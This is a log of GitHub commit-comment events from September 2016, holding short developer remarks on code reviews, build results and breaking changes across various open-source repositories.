{"id":"4595540676","type":"CommitCommentEvent","actor":{"login":"ngbontsi"},"repo":{"name":"ngbontsi/NBDevelopment"},"payload":{"comment":{"id":19111798,"position":2,"line":2,"path":"README.md","commit_id":"857eb2325f9155931d0de970b6f9026821063d34","created_at":"2016-09-21T11:04:59Z","updated_at":"2016-09-21T11:04:59Z","body":"NB Development is a project that I created to monitor my projects that I work on private. The current state on this project is working but not complete. This project will continue growing and improving as time goes but I will try not to drift to far from the original idea. all my projects will have a NBDevelopmentFramework this is my own Framework to assist me from reapiting code and function all over my apps. The Framework is an Android framework I built on top of Android API, I do not think the frame work will be available as it is my hope and key to make it on the Top of Developers"}},"created_at":"2016-09-21T11:04:59Z"}
{"id":"4595544298","type":"CommitCommentEvent","actor":{"login":"Emilysmith901"},"repo":{"name":"chef-cookbooks/php"},"payload":{"comment":{"id":19111803,"position":null,"line":null,"path":null,"commit_id":"867e79c389906459fa80d5ca34d065fd743d1764","created_at":"2016-09-21T11:05:48Z","updated_at":"2016-09-21T11:05:48Z","body":"Thanks, its helpful for me."}},"created_at":"2016-09-21T11:05:48Z"}
{"id":"4595544556","type":"CommitCommentEvent","actor":{"login":"cebe"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":19111804,"position":5,"line":285,"path":"framework/assets/yii.activeForm.js","commit_id":"0c288ea49eed8c98e04af33dd81b32d1809caac5","created_at":"2016-09-21T11:05:51Z","updated_at":"2016-09-21T11:05:51Z","body":"okay, I'm not writing enough JS code it seems :)"}},"created_at":"2016-09-21T11:05:51Z"}
{"id":"4595547968","type":"CommitCommentEvent","actor":{"login":"murilao"},"repo":{"name":"malucooo/Otxserver-Global"},"payload":{"comment":{"id":19111809,"position":null,"line":null,"path":null,"commit_id":"c97365c44af45804a97f20b8c3f914c5e6048fe8","created_at":"2016-09-21T11:06:25Z","updated_at":"2016-09-21T11:06:25Z","body":"Okay, it is corrected."}},"created_at":"2016-09-21T11:06:25Z"}
{"id":"4595549433","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19111812,"position":null,"line":null,"path":null,"commit_id":"6f05df22bc28844ccd99519d6311887d45768977","created_at":"2016-09-21T11:06:47Z","updated_at":"2016-09-21T11:06:47Z","body":"MakeWebKitWork (kbenne) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6f05df22bc28844ccd99519d6311887d45768977-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6f05df22bc28844ccd99519d6311887d45768977-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-21T11:06:47Z"}
{"id":"4595554521","type":"CommitCommentEvent","actor":{"login":"ntorring"},"repo":{"name":"ZipArchive/ZipArchive"},"payload":{"comment":{"id":19111828,"position":null,"line":null,"path":null,"commit_id":"d1e5f47e29da8fd661237718316d40519c9f9a00","created_at":"2016-09-21T11:07:53Z","updated_at":"2016-09-21T11:07:53Z","body":"This will require that the user creates the directory they want tu unzip to beforehand! Is this the intended usage? it is certainly a braking change for some users!"}},"created_at":"2016-09-21T11:07:53Z"}
{"id":"4595560770","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19111844,"position":null,"line":null,"path":null,"commit_id":"6f05df22bc28844ccd99519d6311887d45768977","created_at":"2016-09-21T11:09:20Z","updated_at":"2016-09-21T11:09:20Z","body":"MakeWebKitWork (kbenne) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6f05df22bc28844ccd99519d6311887d45768977-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6f05df22bc28844ccd99519d6311887d45768977-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-21T11:09:20Z"}
{"id":"4595565699","type":"CommitCommentEvent","actor":{"login":"Parovozik"},"repo":{"name":"benvanik/xenia"},"payload":{"comment":{"id":19111854,"position":null,"line":null,"path":null,"commit_id":"a3c2b8b3f5b12762214556b44abc0c152cafc27b","created_at":"2016-09-21T11:10:25Z","updated_at":"2016-09-21T11:10:25Z","body":"@Razzile OK :)"}},"created_at":"2016-09-21T11:10:25Z"}
{"id":"4595565734","type":"CommitCommentEvent","actor":{"login":"schanzer"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":19111855,"position":null,"line":null,"path":null,"commit_id":"ecca6163293d4be7c843440c1db9329a9751107e","created_at":"2016-09-21T11:10:25Z","updated_at":"2016-09-21T11:10:25Z","body":"This feels like some a reason to use something like Babel in our build system - we write ES6/7, tell it what browsers we support, and it generates the LCD safe code. "}},"created_at":"2016-09-21T11:10:25Z"}
{"id":"4595568236","type":"CommitCommentEvent","actor":{"login":"henrik"},"repo":{"name":"barsoom/sie"},"payload":{"comment":{"id":19111863,"position":null,"line":null,"path":null,"commit_id":"c5be19593e4b91504e6266aab017540d98e95eb0","created_at":"2016-09-21T11:10:59Z","updated_at":"2016-09-21T11:10:59Z","body":"It worked 😎 "}},"created_at":"2016-09-21T11:10:59Z"}
{"id":"4595571333","type":"CommitCommentEvent","actor":{"login":"giacgbj"},"repo":{"name":"ZipArchive/ZipArchive"},"payload":{"comment":{"id":19111870,"position":null,"line":null,"path":null,"commit_id":"d1e5f47e29da8fd661237718316d40519c9f9a00","created_at":"2016-09-21T11:11:41Z","updated_at":"2016-09-21T11:11:41Z","body":"I confirm it was a breaking change and I had to create the directory.\r\nPlease pay attention when you change the behavior of a method without changing its signature!"}},"created_at":"2016-09-21T11:11:41Z"}
{"id":"4595572410","type":"CommitCommentEvent","actor":{"login":"sambasivara"},"repo":{"name":"sambasivara/siva"},"payload":{"comment":{"id":19111874,"position":6,"line":6,"path":"f2.java","commit_id":"ed7f1b62e8cbf0798bb73d84efa879841d980928","created_at":"2016-09-21T11:11:58Z","updated_at":"2016-09-21T11:11:58Z","body":"add this file also my dear friend"}},"created_at":"2016-09-21T11:11:58Z"}
{"id":"4595574054","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19111878,"position":null,"line":null,"path":null,"commit_id":"0cfb340e06f709eea2483a561c8a12add223a160","created_at":"2016-09-21T11:12:19Z","updated_at":"2016-09-21T11:12:19Z","body":"I was talking about the bootloader, does it work after this or the operation will brick the phone I'm asking because I haven't yet take a look at loki code, so I don't know how it really works "}},"created_at":"2016-09-21T11:12:19Z"}
{"id":"4595574899","type":"CommitCommentEvent","actor":{"login":"sambasivara"},"repo":{"name":"sambasivara/siva"},"payload":{"comment":{"id":19111881,"position":2,"line":2,"path":"f2.java","commit_id":"ed7f1b62e8cbf0798bb73d84efa879841d980928","created_at":"2016-09-21T11:12:31Z","updated_at":"2016-09-21T11:12:31Z","body":"ideat"}},"created_at":"2016-09-21T11:12:31Z"}
{"id":"4595575579","type":"CommitCommentEvent","actor":{"login":"mukesh51"},"repo":{"name":"angular/angularfire2"},"payload":{"comment":{"id":19111884,"position":null,"line":null,"path":null,"commit_id":"7c46e7f3a8f03991153388b6ddc59d8a97e739b9","created_at":"2016-09-21T11:12:40Z","updated_at":"2016-09-21T11:12:40Z","body":"Updated \"3. Retrieving data as lists\" section to go with the flow. correct componentName, selector, exported component etc."}},"created_at":"2016-09-21T11:12:40Z"}
{"id":"4595578390","type":"CommitCommentEvent","actor":{"login":"noname8135"},"repo":{"name":"noname8135/web_phone"},"payload":{"comment":{"id":19111891,"position":null,"line":null,"path":null,"commit_id":"59ca1cc23be71703f5eaf1f4ba024bf47f3902ad","created_at":"2016-09-21T11:13:18Z","updated_at":"2016-09-21T11:13:18Z","body":"A web phone caller and receiver page using webrtc"}},"created_at":"2016-09-21T11:13:18Z"}
{"id":"4595579215","type":"CommitCommentEvent","actor":{"login":"brevilo"},"repo":{"name":"BOINC/boinc"},"payload":{"comment":{"id":19111895,"position":15,"line":800,"path":"lib/str_util.cpp","commit_id":"01ea1ef8fb659c4488425f9bea380009ebe6843f","created_at":"2016-09-21T11:13:30Z","updated_at":"2016-09-21T11:13:30Z","body":"Only? :-) What's the benefit over `basename(fpath.c_str())` or similar?"}},"created_at":"2016-09-21T11:13:30Z"}
{"id":"4595580687","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19111898,"position":null,"line":null,"path":null,"commit_id":"0cfb340e06f709eea2483a561c8a12add223a160","created_at":"2016-09-21T11:13:51Z","updated_at":"2016-09-21T11:13:51Z","body":"well for now i got to see why build fails at 56% without any error...\r\nbut just this \r\nninja: build stopped: subcommand failed.\r\nmake: *** [ninja_wrapper] Error 1\r\n"}},"created_at":"2016-09-21T11:13:51Z"}
{"id":"4595600325","type":"CommitCommentEvent","actor":{"login":"KiberInfinity"},"repo":{"name":"VkOpt/VkOpt"},"payload":{"comment":{"id":19111941,"position":50,"line":2099,"path":"source/vk_lib.js","commit_id":"d655d06e2432d0d00c68deee798e9a410dd34384","created_at":"2016-09-21T11:18:30Z","updated_at":"2016-09-21T11:18:30Z","body":"проверять и собирать то как-то надо. А с учётом отсутствующего свежего сертификата, хз реально ли подписать старым на хакинтоше."}},"created_at":"2016-09-21T11:18:30Z"}
{"id":"4595600809","type":"CommitCommentEvent","actor":{"login":"simerjots"},"repo":{"name":"ZipArchive/ZipArchive"},"payload":{"comment":{"id":19111944,"position":null,"line":null,"path":null,"commit_id":"d1e5f47e29da8fd661237718316d40519c9f9a00","created_at":"2016-09-21T11:18:37Z","updated_at":"2016-09-21T11:18:37Z","body":"The user was requires to create the directory anyways beforhands.  The only thing that this changed was to allow direct path to the unzip file. "}},"created_at":"2016-09-21T11:18:37Z"}
{"id":"4595603101","type":"CommitCommentEvent","actor":{"login":"fnoks"},"repo":{"name":"h5p/h5p-editor-select-toggle-fields"},"payload":{"comment":{"id":19111947,"position":7,"line":7,"path":"select-toggle-fields.js","commit_id":"e7321ccc5df36e1f2ad210f7d711677f5edd03e9","created_at":"2016-09-21T11:19:11Z","updated_at":"2016-09-21T11:19:11Z","body":"Fixed here: https://github.com/h5p/h5p-editor-select-toggle-fields/commit/3ca29cddb3a943bf7647a2bc0231804d86fad2ab"}},"created_at":"2016-09-21T11:19:11Z"}
{"id":"4595606435","type":"CommitCommentEvent","actor":{"login":"LorenzogamboaES"},"repo":{"name":"Jaspitos/ikariam.io"},"payload":{"comment":{"id":19111949,"position":null,"line":null,"path":null,"commit_id":"517dc9bad2919c46c83d77892e11e39b35467077","created_at":"2016-09-21T11:19:59Z","updated_at":"2016-09-21T11:19:59Z","body":"jajaja deje de poner chorradas!"}},"created_at":"2016-09-21T11:19:59Z"}
{"id":"4595609288","type":"CommitCommentEvent","actor":{"login":"alviteri"},"repo":{"name":"SonyAosp/vendor_sony"},"payload":{"comment":{"id":19111950,"position":null,"line":null,"path":null,"commit_id":"c630e5166e06a266e199e58d05918dd99c235d39","created_at":"2016-09-21T11:20:37Z","updated_at":"2016-09-21T11:20:37Z","body":"Not sensors.msm8939 or msm8916 at all ?"}},"created_at":"2016-09-21T11:20:37Z"}
{"id":"4595614723","type":"CommitCommentEvent","actor":{"login":"SubDragonzj"},"repo":{"name":"SubDragonzj/android_vendor_xiaomi_dior"},"payload":{"comment":{"id":19111991,"position":null,"line":null,"path":null,"commit_id":"d71fe76037ec69c81cc9a9d37f15c081c3bdbad9","created_at":"2016-09-21T11:21:52Z","updated_at":"2016-09-21T11:21:52Z","body":"so tired...  so careless..."}},"created_at":"2016-09-21T11:21:52Z"}
{"id":"4595616506","type":"CommitCommentEvent","actor":{"login":"krishnasrinivas"},"repo":{"name":"minio/minio-js"},"payload":{"comment":{"id":19111998,"position":null,"line":null,"path":null,"commit_id":"07ce5e3582c4aa758f61526c667b4b18cb3d017f","created_at":"2016-09-21T11:22:17Z","updated_at":"2016-09-21T11:22:17Z","body":"@brozkrut apologies for the version number issue. Have fixed the README.md in the latest commit.\r\n\r\n@harshavardhana can we remove 2.0.2 make it 3.0.0 so that others are not affected?"}},"created_at":"2016-09-21T11:22:17Z"}
{"id":"4595619944","type":"CommitCommentEvent","actor":{"login":"pablomh"},"repo":{"name":"SonyAosp/vendor_sony"},"payload":{"comment":{"id":19112012,"position":null,"line":null,"path":null,"commit_id":"c630e5166e06a266e199e58d05918dd99c235d39","created_at":"2016-09-21T11:23:07Z","updated_at":"2016-09-21T11:23:07Z","body":"No, only \"flp.default.so\" in both."}},"created_at":"2016-09-21T11:23:07Z"}
{"id":"4595623056","type":"CommitCommentEvent","actor":{"login":"HamdiBayhan"},"repo":{"name":"HamdiBayhan/Card-Entry-System-Project-with-Rails"},"payload":{"comment":{"id":19112022,"position":5,"line":4,"path":"Gemfile","commit_id":"3d0f100b398de300e35f1e25538ac1b353ccbd6e","created_at":"2016-09-21T11:23:52Z","updated_at":"2016-09-21T11:23:52Z","body":"@leylaKapi  Thank you for the information, searchkick gem working without problem for now but I'm going to keep that in mind. "}},"created_at":"2016-09-21T11:23:52Z"}
{"id":"4595625111","type":"CommitCommentEvent","actor":{"login":"alviteri"},"repo":{"name":"SonyAosp/vendor_sony"},"payload":{"comment":{"id":19112026,"position":null,"line":null,"path":null,"commit_id":"c630e5166e06a266e199e58d05918dd99c235d39","created_at":"2016-09-21T11:24:21Z","updated_at":"2016-09-21T11:24:21Z","body":"I don't have tulip ... Sorry but ... Can you past me the log in build it says what is causing the error .. thanks "}},"created_at":"2016-09-21T11:24:21Z"}
{"id":"4595626407","type":"CommitCommentEvent","actor":{"login":"matthieu637"},"repo":{"name":"BVLC/caffe"},"payload":{"comment":{"id":19112030,"position":null,"line":null,"path":null,"commit_id":"c8f446f640b12b0577063eca8fab004e73c0aefc","created_at":"2016-09-21T11:24:37Z","updated_at":"2016-09-21T11:24:37Z","body":"Since this commit, I cannot copy anymore a network.\r\n```\r\ncaffe::Net<double>* old_network; //network to copy\r\n\r\ncaffe::NetParameter net_param;\r\nold_network->ToProto(&net_param);\r\nnew caffe::Net<double>(net_param);\r\n//  batch_norm_layer.cpp:39] Check failed: this->layer_param_.param_size() == 0 (3 vs. 0) Cannot configure batch normalization statistics as layer parameters.\r\n```\r\n\r\nWhat is the new way to do it?"}},"created_at":"2016-09-21T11:24:37Z"}
{"id":"4595628200","type":"CommitCommentEvent","actor":{"login":"samanthproduction"},"repo":{"name":"samanthproduction/production"},"payload":{"comment":{"id":19112035,"position":4,"line":10,"path":"Testing_dev/WebContent/testdevjsp.jsp","commit_id":"53be801eb10b56a1e52591e171bc5c089620be9c","created_at":"2016-09-21T11:25:05Z","updated_at":"2016-09-21T11:25:05Z","body":"i changed code here"}},"created_at":"2016-09-21T11:25:05Z"}
{"id":"4595630591","type":"CommitCommentEvent","actor":{"login":"01deyishu"},"repo":{"name":"01deyishu/yanshen.me"},"payload":{"comment":{"id":19112038,"position":null,"line":null,"path":null,"commit_id":"e05e07e179acee8c2c880caab0dbd821fd1118c2","created_at":"2016-09-21T11:25:39Z","updated_at":"2016-09-21T11:25:39Z","body":"OK"}},"created_at":"2016-09-21T11:25:39Z"}
{"id":"4595631448","type":"CommitCommentEvent","actor":{"login":"jmchilton"},"repo":{"name":"galaxyproject/planemo"},"payload":{"comment":{"id":19112040,"position":null,"line":null,"path":null,"commit_id":"ea5324ff4e30d097483350530a5cf18c7ed28bcb","created_at":"2016-09-21T11:25:51Z","updated_at":"2016-09-21T11:25:51Z","body":"Thanks"}},"created_at":"2016-09-21T11:25:51Z"}
{"id":"4595638863","type":"CommitCommentEvent","actor":{"login":"thomasmars"},"repo":{"name":"h5p/h5p-editor-php-library"},"payload":{"comment":{"id":19112050,"position":5,"line":139,"path":"scripts/h5peditor-dimensions.js","commit_id":"c70cac28c9171f2ccc7a3765b02196a6547e1b62","created_at":"2016-09-21T11:27:36Z","updated_at":"2016-09-21T11:27:36Z","body":"Has this been resolved ?"}},"created_at":"2016-09-21T11:27:36Z"}
{"id":"4595639834","type":"CommitCommentEvent","actor":{"login":"tasmo"},"repo":{"name":"tonsky/AnyBar"},"payload":{"comment":{"id":19112054,"position":8,"line":22,"path":"README.md","commit_id":"0438031cde94663a9846e9f402c343ecd487de4e","created_at":"2016-09-21T11:27:51Z","updated_at":"2016-09-21T11:27:51Z","body":"It's easier to use:\r\n```sh\r\nopen -a AnyBar\r\n```"}},"created_at":"2016-09-21T11:27:51Z"}
{"id":"4595651264","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19112070,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-21T11:30:21Z","updated_at":"2016-09-21T11:30:21Z","body":"Please check the plugin using the latest version of skin.py. https://github.com/OpenViX/enigma2/commit/c0d47ad7d32cfdef061373737ca8c995c23db980\r\n\r\nCheck debug log for this message: \r\n\"[skin][parseCoordinate] Unexpected input value: \""}},"created_at":"2016-09-21T11:30:21Z"}
{"id":"4595651621","type":"CommitCommentEvent","actor":{"login":"jokebot"},"repo":{"name":"jokebot/jokebot"},"payload":{"comment":{"id":19112071,"position":17,"line":18,"path":"index.js","commit_id":"0fdcf8a4c1631a3379f079340a2c51688b572074","created_at":"2016-09-21T11:30:25Z","updated_at":"2016-09-21T11:30:25Z","body":"@pimterry Test line comment notification"}},"created_at":"2016-09-21T11:30:25Z"}
{"id":"4595652844","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19112077,"position":null,"line":null,"path":null,"commit_id":"0cfb340e06f709eea2483a561c8a12add223a160","created_at":"2016-09-21T11:30:44Z","updated_at":"2016-09-21T11:30:44Z","body":"Take a look better, there must be an error.. "}},"created_at":"2016-09-21T11:30:44Z"}
{"id":"4595655453","type":"CommitCommentEvent","actor":{"login":"eugeneia"},"repo":{"name":"snabbco/snabb"},"payload":{"comment":{"id":19112080,"position":28,"line":56,"path":"src/apps/ipsec/esp.lua","commit_id":"fa01474c430dbf938feda5d5df7775b377b14fe2","created_at":"2016-09-21T11:31:20Z","updated_at":"2016-09-21T11:31:20Z","body":"This behavior is equal to the old API by the way, we both only noticed this branch case when looking at the new API, I think. See https://github.com/snabbco/snabb/commit/1b084281848b57ac320c8a4cef92b17610a77b44#diff-43eed07c0c5cb316e7ea2726a3e45b10R186\r\n\r\n"}},"created_at":"2016-09-21T11:31:20Z"}
{"id":"4595662991","type":"CommitCommentEvent","actor":{"login":"Tripty"},"repo":{"name":"fourleafed/fundler-theme"},"payload":{"comment":{"id":19112093,"position":null,"line":null,"path":null,"commit_id":"ad8318ce9ba98437c135782767b12f287a2d359f","created_at":"2016-09-21T11:33:08Z","updated_at":"2016-09-21T11:33:08Z","body":"With which wordpress version should it work? Can you please reply fast?"}},"created_at":"2016-09-21T11:33:08Z"}
{"id":"4595663067","type":"CommitCommentEvent","actor":{"login":"sureshvicrant"},"repo":{"name":"sureshvicrant/imad-2016-app"},"payload":{"comment":{"id":19112094,"position":4,"line":12,"path":"ui/index.html","commit_id":"6de8b788c373ad0c4cc26dad0d7fcfcda4c6df31","created_at":"2016-09-21T11:33:09Z","updated_at":"2016-09-21T11:33:09Z","body":"# Display"}},"created_at":"2016-09-21T11:33:09Z"}
{"id":"4595663635","type":"CommitCommentEvent","actor":{"login":"JE1982"},"repo":{"name":"StataBS/indikatoren"},"payload":{"comment":{"id":19112096,"position":null,"line":null,"path":null,"commit_id":"cec7e4a522b3105312c0e576a1d4f059b07ce4d3","created_at":"2016-09-21T11:33:17Z","updated_at":"2016-09-21T11:33:17Z","body":"hier bitte die richtigen Werte (grün!) übernehmen. Die roten Werte sind falsch! "}},"created_at":"2016-09-21T11:33:17Z"}
{"id":"4595664543","type":"CommitCommentEvent","actor":{"login":"christopho"},"repo":{"name":"christopho/solarus"},"payload":{"comment":{"id":19112098,"position":5,"line":4,"path":"sample_quest/data/scripts/menus/hud.lua","commit_id":"81947626b5a236b73233bd75759b6d0db7c80003","created_at":"2016-09-21T11:33:31Z","updated_at":"2016-09-21T11:33:31Z","body":"I didn't want to call them \"buttons\" because the word \"button\" is already used in mouse functions. You even had two different variables with the same name \"button\" before, one hiding the other.\r\n\r\nBut the main point of this change is to give names to values instead of numbers."}},"created_at":"2016-09-21T11:33:31Z"}
{"id":"4595665508","type":"CommitCommentEvent","actor":{"login":"ochiait"},"repo":{"name":"ochiait/kadai_asagao"},"payload":{"comment":{"id":19112100,"position":null,"line":null,"path":null,"commit_id":"2558e46f250ffa7a9c090b6e35368c8b23e388ff","created_at":"2016-09-21T11:33:44Z","updated_at":"2016-09-21T11:33:44Z","body":"のはずが、\r\nnumber_with_delimiter(member.score)\r\nでないとエラーに"}},"created_at":"2016-09-21T11:33:44Z"}
{"id":"4595672282","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19112114,"position":null,"line":null,"path":null,"commit_id":"387b3b84f211e2d32ff5f6b5e205ae2c212f2403","created_at":"2016-09-21T11:35:17Z","updated_at":"2016-09-21T11:35:17Z","body":"Sizing-Simple-Chilled-Ceiling (RKStrand) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-387b3b84f211e2d32ff5f6b5e205ae2c212f2403-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-21T11:35:17Z"}
{"id":"4595678351","type":"CommitCommentEvent","actor":{"login":"nickstenning"},"repo":{"name":"hypothesis/h"},"payload":{"comment":{"id":19112130,"position":9,"line":112,"path":"tests/h/auth/services_test.py","commit_id":"60fa4bd2251ead02ab914c1e501ea7478eaae58d","created_at":"2016-09-21T11:36:41Z","updated_at":"2016-09-21T11:36:41Z","body":"I probably would have done your assertions against `userid()`, not `_userid`."}},"created_at":"2016-09-21T11:36:41Z"}
{"id":"4595679474","type":"CommitCommentEvent","actor":{"login":"brusch"},"repo":{"name":"pimcore/pimcore"},"payload":{"comment":{"id":19112134,"position":null,"line":null,"path":null,"commit_id":"87959964e596f9916a73b2daab613427ca979021","created_at":"2016-09-21T11:36:59Z","updated_at":"2016-09-21T11:36:59Z","body":"Thanks - done. "}},"created_at":"2016-09-21T11:36:59Z"}
{"id":"4595681072","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19112140,"position":null,"line":null,"path":null,"commit_id":"585ca21c115460a8039b5a473c1dd682b17797f0","created_at":"2016-09-21T11:37:21Z","updated_at":"2016-09-21T11:37:21Z","body":"I hope and expect that the test will fail. But better safe than sorry: if it is an Elo gain to remove the line, we'll have some more information for an argument decision."}},"created_at":"2016-09-21T11:37:21Z"}
{"id":"4595682245","type":"CommitCommentEvent","actor":{"login":"ignatenkobrain"},"repo":{"name":"rpm-software-management/dnf"},"payload":{"comment":{"id":19112142,"position":6,"line":154,"path":"dnf/plugin.py","commit_id":"0190d067800fdb48d68dcc9c9158351987521854","created_at":"2016-09-21T11:37:37Z","updated_at":"2016-09-21T11:37:37Z","body":"`if skips is not None` is more correct way.\r\n\r\nIf you do `if skips` it's internally transformed to `if bool(skips)` which is not completely correct in our case. Also it slows down python more ;)"}},"created_at":"2016-09-21T11:37:37Z"}
{"id":"4595683295","type":"CommitCommentEvent","actor":{"login":"pasildan"},"repo":{"name":"Wargus/wargus"},"payload":{"comment":{"id":19112145,"position":null,"line":null,"path":null,"commit_id":"ecbd913864cd4c4fd23810c274a68dd76bff4017","created_at":"2016-09-21T11:37:52Z","updated_at":"2016-09-21T11:37:52Z","body":"do you have any personal e-mail to contact? I have been looking around wargus project code and fixed already some bugs with a friend too."}},"created_at":"2016-09-21T11:37:52Z"}
{"id":"4595689039","type":"CommitCommentEvent","actor":{"login":"aurangel"},"repo":{"name":"cscart/addon-wishlist-sort"},"payload":{"comment":{"id":19112165,"position":5,"line":5,"path":"app/addons/wishlist_sort/func.php","commit_id":"02017502f5ea611d6c1117632bd6944e7496e6f0","created_at":"2016-09-21T11:39:12Z","updated_at":"2016-09-21T11:39:12Z","body":"Сортировка и раньше проходит в момент авторизации покупателя."}},"created_at":"2016-09-21T11:39:12Z"}
{"id":"4595690305","type":"CommitCommentEvent","actor":{"login":"nynnejc"},"repo":{"name":"nynnejc/website"},"payload":{"comment":{"id":19112172,"position":null,"line":null,"path":null,"commit_id":"18a354cb4f4aeb4e11bf35c798c7c42252721c24","created_at":"2016-09-21T11:39:28Z","updated_at":"2016-09-21T11:39:28Z","body":"Incredible work!!"}},"created_at":"2016-09-21T11:39:28Z"}
{"id":"4595691171","type":"CommitCommentEvent","actor":{"login":"ochiait"},"repo":{"name":"ochiait/kadai_asagao"},"payload":{"comment":{"id":19112175,"position":null,"line":null,"path":null,"commit_id":"c276947b197a10baa3328fc5da7914f457342a4f","created_at":"2016-09-21T11:39:39Z","updated_at":"2016-09-21T11:39:39Z","body":"member.score.to_s(:delimited)\r\nでもOKのはずが、\r\nnumber_with_delimiter(member.score)\r\nでないとエラーに"}},"created_at":"2016-09-21T11:39:39Z"}
{"id":"4595691474","type":"CommitCommentEvent","actor":{"login":"AmitPatel-BoTreeConsulting"},"repo":{"name":"NishantUpadhyay-BTC/code_forest"},"payload":{"comment":{"id":19112177,"position":1,"line":1,"path":"app/workers/newsletter_worker.rb","commit_id":"62466cb164a78d04b7afd8b286ac45be2946f38f","created_at":"2016-09-21T11:39:43Z","updated_at":"2016-09-21T11:39:43Z","body":"Prefer using ActiveJob instead of vanilla Workers"}},"created_at":"2016-09-21T11:39:43Z"}
{"id":"4595692319","type":"CommitCommentEvent","actor":{"login":"eugeneia"},"repo":{"name":"ioannad/experiments"},"payload":{"comment":{"id":19112181,"position":53,"line":56,"path":"rpiOS/K9OS/k9os.c","commit_id":"dab4692eedcefd23f5acb07591d03878ce776c42","created_at":"2016-09-21T11:39:55Z","updated_at":"2016-09-21T11:39:55Z","body":"@vanfstd The tutorial this is adapted from used:\r\n\r\n```\r\ngpio = (unsigned int*) GPIO_BASE;\r\ngpio[4] |= (1<<18);\r\n```\r\n\r\n@ioannad didn't get how that works, I think. I told her “well they are just treating the pointer as an pointer to an array.” Thinking about it, they probably should cast `GPIO_BASE` to an `unsigned int[]*` (e.g. pointer to an array of unsigned integers), no?\r\n\r\nWhat’s going on here Timo? :-)"}},"created_at":"2016-09-21T11:39:55Z"}
{"id":"4595692828","type":"CommitCommentEvent","actor":{"login":"thankjura"},"repo":{"name":"Heather/gentoo-gnome"},"payload":{"comment":{"id":19112182,"position":null,"line":null,"path":null,"commit_id":"fa6a6cc8cd7592fb0d03d7008bc622b26660a1c5","created_at":"2016-09-21T11:40:02Z","updated_at":"2016-09-21T11:40:02Z","body":"@mpkh Что касается патча для gnome-shell -  то тот что по ссылке работает, все комплится, но gdm не грузится(gnome-shell не может найти либы), ща думаю в gnome-session зашить переменную LD_LIBRARY_PATH"}},"created_at":"2016-09-21T11:40:02Z"}
{"id":"4595695567","type":"CommitCommentEvent","actor":{"login":"commercialsuicide"},"repo":{"name":"krabradosty/pshkBlogAdmin"},"payload":{"comment":{"id":19112186,"position":null,"line":null,"path":null,"commit_id":"fd7a2300e5fae655dfc1067407d783831f4b90f3","created_at":"2016-09-21T11:40:39Z","updated_at":"2016-09-21T11:40:39Z","body":"+ binding"}},"created_at":"2016-09-21T11:40:39Z"}
{"id":"4595697827","type":"CommitCommentEvent","actor":{"login":"gut"},"repo":{"name":"PPC64/hhvm"},"payload":{"comment":{"id":19112196,"position":null,"line":null,"path":null,"commit_id":"db8af9a74d192d99c3d1d89d292bbd09a06796cb","created_at":"2016-09-21T11:41:12Z","updated_at":"2016-09-21T11:41:12Z","body":"Are you going to send this?"}},"created_at":"2016-09-21T11:41:12Z"}
{"id":"4595699605","type":"CommitCommentEvent","actor":{"login":"plhrja"},"repo":{"name":"plhrja/TiraLabra2013"},"payload":{"comment":{"id":19112202,"position":4,"line":48,"path":"src/gui/MPVGUI.java","commit_id":"a1b95b11fd00aeac15da05c1441563edddbdd9f2","created_at":"2016-09-21T11:41:36Z","updated_at":"2016-09-21T11:41:36Z","body":"Noresizeeee"}},"created_at":"2016-09-21T11:41:36Z"}
{"id":"4595700403","type":"CommitCommentEvent","actor":{"login":"dbrgn"},"repo":{"name":"saltyrtc/saltyrtc-meta"},"payload":{"comment":{"id":19112205,"position":null,"line":null,"path":null,"commit_id":"18840cd554cd609941a2a0179e409572c87d5df6","created_at":"2016-09-21T11:41:48Z","updated_at":"2016-09-21T11:41:48Z","body":"I would not specify how much of the data should be cached. In my case I'm using a FIFO hashmap that only keeps a limited number of entries. Other implementations might be better off by using time based approaches.\r\n\r\nIn any case, let's just leave the concrete implementation unspecified."}},"created_at":"2016-09-21T11:41:48Z"}
